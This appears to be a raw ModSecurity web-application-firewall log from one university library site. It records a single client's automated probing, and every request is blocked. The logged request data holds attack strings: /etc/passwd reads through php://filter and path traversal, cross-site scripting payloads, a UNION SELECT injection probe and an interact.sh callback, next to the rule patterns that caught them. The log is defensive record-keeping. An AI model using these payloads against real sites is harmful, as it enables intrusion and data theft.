[Tue Aug 29 11:53:20.539649 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAoesNUAAAAV"]
[Tue Aug 29 11:53:21.686094 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAoT7W4AAAAD"]
[Tue Aug 29 11:53:22.547792 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAolKWEAAAAe"]
[Tue Aug 29 11:53:23.332751 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAoXJwkAAAAP"]
[Tue Aug 29 11:53:24.120976 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAot8PgAAAAn"]
[Tue Aug 29 11:53:24.695613 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAor7r0AAAAk"]
[Tue Aug 29 11:53:24.797475 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAn4050AAAAW"]
[Tue Aug 29 11:53:26.204190 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xsCo-f0AAAoAkz0AAAAC"]
[Tue Aug 29 11:53:26.207402 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/search"] [unique_id "ZO15xsCo-f0AAAn406AAAAAW"]
[Tue Aug 29 11:53:26.836403 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xsCo-f0AAAni-EQAAAAU"]
[Tue Aug 29 11:53:27.107611 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoz71gAAAAS"]
[Tue Aug 29 11:53:27.843212 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAni-EoAAAAU"]
[Tue Aug 29 11:53:27.893043 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoz710AAAAS"]
[Tue Aug 29 11:53:28.115225 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAot8QEAAAAn"]
[Tue Aug 29 11:53:28.818978 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAfWOXoAAAAL"]
[Tue Aug 29 11:53:28.820099 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAog@GIAAAAY"]
[Tue Aug 29 11:53:29.387443 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAor7s4AAAAk"]
[Tue Aug 29 11:53:30.603025 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAot8QcAAAAn"]
[Tue Aug 29 11:53:31.235757 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAnHQr8AAAAT"]
[Tue Aug 29 11:53:34.120369 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zsCo-f0AAAot8RcAAAAn"]
[Tue Aug 29 11:53:35.323875 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15z8Co-f0AAAox7IYAAAAN"]
[Tue Aug 29 11:53:35.915344 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAnHQswAAAAT"]
[Tue Aug 29 11:53:37.801374 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAnHQs8AAAAT"]
[Tue Aug 29 11:53:39.079224 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAoGFdsAAAAE"]
[Tue Aug 29 11:53:41.933567 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApHRVAAAAAP"]
[Tue Aug 29 11:53:42.788568 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAfWOZUAAAAL"]
[Tue Aug 29 11:53:42.811278 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoAk1wAAAAC"]
[Tue Aug 29 11:53:43.712460 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAApIdi0AAAAU"]
[Tue Aug 29 11:53:43.747984 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoUJdIAAAAB"]
[Tue Aug 29 11:53:45.564090 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoqbVYAAAAj"]
